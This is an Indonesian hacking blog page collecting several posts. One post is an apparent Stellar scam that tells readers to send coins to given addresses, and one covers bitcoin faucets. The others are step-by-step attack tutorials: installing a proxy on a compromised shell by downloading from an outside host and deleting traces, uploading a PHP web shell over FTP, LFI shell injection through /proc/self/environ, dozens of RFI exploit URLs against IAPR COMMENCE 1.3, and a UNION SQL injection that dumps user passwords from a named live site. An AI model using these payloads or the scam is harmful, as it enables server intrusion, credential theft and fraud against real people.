Cara Mendaftar dan Mendapatkan Stellar



1. Pertama Anda Menuju ke Sini https://launch.stellar.org/#/register
   Masukkan informasi yang diminta. Yakni berupa username dan password. Masukkan username yang mudah diingat dan password minimal 8 karakter.



2. Verifikasi Email Anda
   Berikut form untuk memasukkan email. Masukkan email anda lalu submit



3. Setelah itu, cek email anda dan masukkan recovery code.:


4. Connect kan ke facebook kamu


5. kirim stellar 150 atau 100 atau 50
   ( habis ngirim stellar anda, anda akan mendapat kan STR yang dikirim tadi )
   - Send to: g9ztXHkVWs5BNKstJ9FsC215HxiW8Hpm4p
   - Amount: 100

6. Klik Logout, Terus Login Lagi.

7. Send Balance lagi
 Masukan Data Data Berikut:
- Send to: gLQCaqNokjLS2rCYajVDnXvJovHoKSeYgk
- Amount: 100

Selamat Mencoba.
[Read More...]


Ayo berburu $$$ dgn bitcoin



1 BITCOIN itu ato sering dsebut BTC bila dtukar ke rupiah, pernah mencapai Rp. 12jt.

nah lgsg saja.

sblm nya hrs daftar dl akun bitcoin pke wallet https://blockchain.info/id/wallet

cara daftar nya...
1. buka https://blockchain.info/id/wallet dibrowser anda
2. buatkan dompet baru
3. stlah slsai dftar,jgn lupa check email anda utk melihat page login dan alamat bitcoin anda d wallet anda.

stlah slsai daftar bitcoin, lgsg saja buka d browser anda web2 yg memberikan free bitcoin , contohnya :
1. Freebitco.in ( hrs daftar )
2. Dailybitcoins.org ( gk prlu daftar , hny memasukkan akun BTC anda )
3. Coinad.com ( hrs daftar )

anda bsa mencari web2 yg memberikan free bitcoin slaen yg 3 d atas..

cara mendapatkan koin BTC nya pada :
1. Freebitco.in , login terlebih dahulu.. stlah itu anda hnya memasukkan angka/tulisan yg tertera pada image. bisa d ulangi stlah 1 jam kemudian..intinya kita bsa ngeklik captcha nya itu stiap 1 jam.
kita bsa withdraw BTC nya biar masuk k akun kita stlah amountnya min. 0.0001 BTC

2. Dailybitcoins.org , hnya memasukkan angka/tulisan yg tertera pada image dan alamat bitcoin anda. bisa d ulangi stlah 1 jam kemudian..intinya kita bsa ngeklik captcha nya itu stiap 1 jam.
kita bsa withdraw BTC nya biar masuk k akun kita stlah amountnya min. 0.0001 BTC

3. Coinad.com , kita ngeklik iklan yg ada pada menu view ads.


utk melihat rate tukar dan changer bitcoin, bsa lht di artabit.com ato bitcoin.id

enjoy bro & sist...
klo msh kurang mengerti, anda bsa diskusi lgsg dgn saia melalui fb ato ym

thanks

[Read More...]


How to install proxy by shell



actually, much people know how to install a proxy by shell..but i will show again as a archive for me. :D

the tools :
1. shell
2. the proxy.tgz file... you can download in http:www.gantos.pl/proxy.tgz


1. login to your shell...
2. find the directory which give execute for permission 777,
-command : “find / -perm 777 -type d” ,
-if not execute, we go direct to direcotory : /tmp ato /dev/shm/ ,
3. wget the proxy,
-command : “wget url/file” ex: “wget www.gantos.pl/proxy.tgz”
-if not success, use command : “lwp-download www.gantos.pl/proxy.tgz”
see the pict
4. extract file :
-command : “tar -zxvf proxy.tgz”
-after extract, dont forget to remove your cookies, command : "rm -fproxy.tgz"
see the pict
5. after extract, we go in "pro" directory
-command : “cd pro”
see the pict
6. execute file xh,
-command : “ ./xh -s ./httpd ./prox -a -d -pPort” , default port : 5050
7. after all done, check your ip at irc room....
[Read More...]


How to upload PHPShell via Ftp



1. Run -> cmd.exe
Here is my view cmd.exe
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C: \ Users \ zhie0>

2. Put Files phpshell.php in C: \
C: \ Users \ zhie0> cd C: \
C: \> dir
Volume in drive C has no label.
Volume Serial Number is CO70-B35F
Directory of C: \
09/08/2011 08:32 PM 41.761 phpshell.php

3. Login to FTP sites using the login cpanel
C: \> ftp target.com
Connected to target.com
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 11:10. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You Will be disconnected after 15 minutes of inactivity.
User (target.com: (none)): UserNameTarget
331 Users UserNameTarget OK. password required
password:
230 OK. Current restricted directory is /
ftp>

4. Do not forget to move the directory
ftp> cd public_html
250 OK. Current directory is / public_html

5. Upload phpshell.php with the command
ftp> mput phpshell.php
mput phpshell.php
200 PORT Command Successful
150 Connecting to port 19 294
226-File successfully transferred [The file was successfully uploaded]
226 11 940 seconds (Measured here), 3:42 Kbytes per second
ftp:41761 bytes sent in 11.65Seconds 3.58Kbytes/sec.
ftp>

6. 226-File successfully transferred <<== mark has been uploaded

7. To Rename the file with the command
rename phpshell.php blabla.php

8. Do not forget to quit with the command
ftp> quit
221-Goodbye. You uploaded 88 and downloaded 0 kbytes.
221 Logout.
[Read More...]


Hacking LFI & upload shell via tamper data



1. Mencari target via bot scanner ato googling..
contoh dork : inurl:com_ckforms

2. Setelah nemu target, cek dl apa target tsb vuln LFI ato tdk dgn mnambahkan perintah ../ :
contoh :
http://www.target.com/index.php?option= … p;view=../

tambah dgn printah etc/passwd untuk mencari file passwd, jika masih keluar error maka kita tambahin perintah ../ sampe g keluar error ato file passwd bisa di eksekusi.
http://www.target.com/index.php?option= … etc/passwd <-- klo msh error , cari lg..

http://www.target.com/index.php?option= … etc/passwd <-- contoh ini sdh tdk error lg.

cara kerja nya hmpr sama dgn sql injeksi , klo d sql injeksi kta dwajibkan mencari magic no dgn mnggunakan angka , sdgkan pada LFI injeksi kta mnggunakan printah ../

3. bila sudah tidak error lagi ato file passwd dah bisa di eksekusi maka slnjutnya kita ubah etc/passwd
mnjdi proc/self/environ
http://www.target.com/index.php?option= … lf/environ

stlh environ bsa d akses , mka kita akan k tahap slnjut nya...

4. upload shell via tamper data ( https://addons.mozilla.org/en-US/firefox/addon/966 )

5. klo udah ad tamper data nya , buka tuh tamper data n start tamper. stlh itu refresh lg target nya

6. ubah User-Agent yg ad pda tamper data menjadi script injection shell.

7. stlh itu klik ok,maka mozilla yg di url target
http://www.target.com/index.php?option= … lf/environ
akan ngeloading,kalo dah selesai loading,kalo keluar forbidden ato error,maka gagal.stop tamper datanya.

8. klo sukses uploadnya , silahkan buka shell anda..
http://www.target.com/shellanda.php
[Read More...]


Remote File Inclusion



Sekarang saia ingin brbagi ttg RFI.
Psti sdh bnyk yg mendengar dan tau apa yg disebut dgn Remote File Inclusion (RFI).

Remote File Inclusion : sebuah bentuk srangan scra remote yg memanfaatkan kelemahan script pd suatu page website krn tdk tersanitasi dgn baik, dgn cara menyisipkan script lain untuk exploitasi,

Tehnik ini sendiri mengharuskan webserver yg bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yg disisipi dibuat menggunakan bahasa script tsb. Target RFI biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yg rawan terhadap serangan RFI.

MENGAPA BISA TERJADI?
———————-
Sebuah serangan RFI terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yg tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:

1. Variabel yg tidak dideklarasikan dgn benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:


include($my_ms[”root”].’/error.php’);


Variabel tsb memiliki kemungkinan untuk disisipi file dari luar webserver dgn eksploit
script PHP Incetion:

http://www.target.com/[Script

Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

2. Setting dalam file PHP.ini

register_globals=On
magic_quotes=off
allow_fopenurl=on

CONTOH SERANGAN dgn MENGGUNAKAN TEKNIK RFI
———————————————
Pada kesempatan kali ini saia akan memberikan sebuah contoh penyerangan dgn menggunakan teknik Remote File Inclusion. yg saia jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yg tidak terfilter dgn baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dgn menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :

http://target.com/Commence/includes/

db_connect.php?php_root_path=http://shell.txt

http://target.com/Commence/includes/

include_all_fns.php?php_root_path=http://shell.txt

http://target.com/Commence/includes/

main_fns.php?php_root_path=http://shell.txt

http://target.com/Commence/includes/

output_fns.php?php_root_path=http://shell.txt

http://target.com/Commence/includes/

user_authen_fns.php?php_root_path=http://shell.txt

http://target.com/Commence/admin/includes/

include_all_fns.php?php_root_path=http://shell.txt

http://target.com/Commence/admin/phase/

include_all_phase.php?php_root_path=http://shell.txt

http://target.com/Commence/admin/phase/

phase1.php?php_root_path=http://shell.txt

http://target.com/Commence/admin/phase/

phase1.php?privilege_root_path=http://shell.txt

http://target.com/Commence/admin/phase/

phase2.php?php_root_path=http://shell.txt

http://target.com/Commence/admin/phase/

phase2.php?privilege_root_path=http://shell.txt

http://target.com/Commence/admin/phase/

phase3.php?php_root_path=http://shell.txt

http://target.com/Commence/admin/phase/

phase3.php?privilege_root_path=http://shell.txt

http://target.com/Commence/admin/phase/

phase4.php?php_root_path=http://shell.txt

http://target.com/Commence/admin/phase/

phase4.php?privilege_root_path=http://shell.txt

http://target.com/Commence/admin/phase/

phasebase.php?php_root_path=http://shell.txt

http://target.com/Commence/includes/page_includes/

page.php?php_root_path=http://shell.txt

http://target.com/Commence/includes/page_includes/

pagebase.php?php_root_path=http://shell.txt

http://target.com/Commence/reviewer/includes/

include_all_fns.php?php_root_path=http://shell.txt

http://target.com/Commence/reviewer/phase/

include_all_phase.php?php_root_path=http://shell.txt

http://target.com/Commence/includes/page_includes/

pagebase.php?php_root_path=http://shell.txt

http://target.com/Commence/reviewer/phase/

phase1.php?php_root_path=http://shell.txt

http://target.com/Commence/reviewer/phase/

phase1.php?privilege_root_path=http://shell.txt

http://target.com/Commence/reviewer/phase/

phase2.php?php_root_path=http://shell.txt

http://target.com/Commence/reviewer/phase/

phase2.php?privilege_root_path=http://shell.txt

http://target.com/Commence/reviewer/phase/

phase3.php?php_root_path=http://shell.txt

http://target.com/Commence/reviewer/phase/

phase3.php?privilege_root_path=http://shell.txt

http://target.com/Commence/reviewer/phase/

phase4.php?php_root_path=http://shell.txt

http://target.com/Commence/reviewer/phase/

phase4.php?privilege_root_path=http://shell.txt

http://target.com/Commence/reviewer/phase/

phasebase.php?php_root_path=http://shell.txt

http://target.com/Commence/user/phase/

include_all_phase.php?php_root_path=http://shell.txt

http://target.com/Commence/user/phase/

phase1.php?php_root_path=http://shell.txt

http://target.com/Commence/user/phase/

phase2.php?php_root_path=http://shell.txt

http://target.com/Commence/user/phase/

phase3.php?php_root_path=http://shell.txt

http://target.com/Commence/user/phase/

phase4.php?php_root_path=http://shell.txt

http://target.com/Commence/user/phase/

phasebase.php?php_root_path=http://shell.txt

TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dgn cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

APA yg HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yg sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yg mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yg berarti terhadap CMS yg mungkin sekarang anda gunakan. Selalu perhatikan raw log yg biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yg agak menyimpang seperti
GET /index.php?page=http://www.injek-pake-kaki.net/cmd?
anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yg anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha² infiltrasi dan usaha eksploitasi lokal.

Source : http://blog.skutengboy.us/remote-file-inclusion
[Read More...]


SQL Injection Tutorial



===========================================================

SQL INJEKSI

===========================================================

pengertian sql injection:

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

===========================================================

Yang perlu di ketahui sebelum sql injection pada mysql:

karakter: ',-

comments: /*,--

information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

inurl:"detail_event.php?e_id="


Langkah I :
===========================================================

Mencari Target yg vuln sql

Tambahkan karakter ' pada akhir site atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

contoh: [site]/detail_event.php?e_id=189' atau [site]/detail_event.php?e_id=-189

http://www.lawlibrary.org/detail_event.php?e_id=-189


Langkah II :
===========================================================

mencari dan menghitung jlh table yang ada dlm db nya

gunakan perintah : order by

contoh: [site]/detail_event.php?e_id=-189 order by 1-- atau

[site]/detail_event.php?e_id=-189 order by 1/*

ceklah secara step by step...

misal: [site]/detail_event.php?e_id=-189 order by 1--

[site]/detail_event.php?e_id=-189 order by 2--

sehingga muncul error atau hilang pesan error...

misal: [site]/detail_event.php?e_id=-189 order by 12--

berarti yang kita ambil adalah sampai angka 11

menjadi [site]/detail_event.php?e_id=-189 order by 11--

http://www.lawlibrary.org/detail_event.php?e_id=-189 union all select 1,2,3,4,5,6,7,8,9,10,11--


Langkah III :
===========================================================

Melihat angka yg muncul

karena tadi error sampai angka 12

maka: [site]/detail_event.php?e_id=-189 union all select 1,2,3,4,5,6,7,8,9,10,11--

ok seumpama yg keluar angka 4

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi

misal: [site]/detail_event.php?e_id=-189 union select 1,2,3,version(),5,6,7,8,9,10,11-- atau

[site]/detail_event.php?e_id=-189 union select 1,2,3,@@version,5,6,7,8,9,10,11--

http://www.lawlibrary.org/detail_event.php?e_id=-189 union all select 1,2,3,version(),5,6,7,8,9,10,11--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From Information_schema..


Langkah IV :
===========================================================

Menampilkan table yg ada pada web tsb adalah

perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi

perintah from information_schema.tables where table_Schema=database()-- >>> dimasukan setelah angka terakhir

[site]/detail_event.php?e_id=-189 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11 from information_Schema.tables where table_Schema=database()--

seumpama table yang muncul adalah "users"

http://www.lawlibrary.org/detail_event.php?e_id=-189 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11 from information_schema.columns where table_name=database()--


Langkah V :
===========================================================

Menampilkan semua isi dari table tsb ( column )

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi

perintah from information_schema.columns where table_name=0xhexa >>> dimasukan setelah angka terakhir

[site]/detail_event.php?e_id=-189 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11 from information_schema.columns where table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya

website yg digunakan untuk konversi :http://piclist.com/techref/ascii.htm

http://www.industrialtrainer.com/Unicode.shtm

http://www.dolcevie.com/js/converter.html

http://centricle.com/tools/ascii-hex/ [dan lain sebagainya]

contoh kata yg ingin di konversi yaitu users maka akan menjadi 7573657273

[site]/detail_event.php?e_id=-189 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11 from information_schema.columns where table_name=0x7573657273--

http://www.lawlibrary.org/detail_event.php?e_id=-189 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11 from information_schema.columns where table_name=0x7573657273--


Langkah VI :
===========================================================

memunculkan apa yg tadi telah dikeluarkan dari table :

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi

perintah from (nama table berasal) >>> dimasukan setelah angka terakhir

contoh :

[site]/detail_event.php?e_id=-189 union all select 1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8,9,10,11 from (nama table berasal)--

contoh kata yang keluar adalah u_username,u_password

[site]/detail_event.php?e_id=-189 union all select 1,2,3,concat_ws(0x3a,u_username,u_password),5,6,7,8,9,10,11 from users--

http://www.lawlibrary.org/detail_event.php?e_id=-189 union all select 1,2,3,concat_ws(0x3a,u_username,u_password),5,6,7,8,9,10,11 from users--

dan lht hasilnya


Langkah VII :
===========================================================

tahap terakhir mencari halam admin atau login

selanjutnya terserah anda karena web ada di tangan anda...



Salam

zhie_o

[Read More...]


 
Return to top of page Copyright © 2012 | Powered by Sibukalipun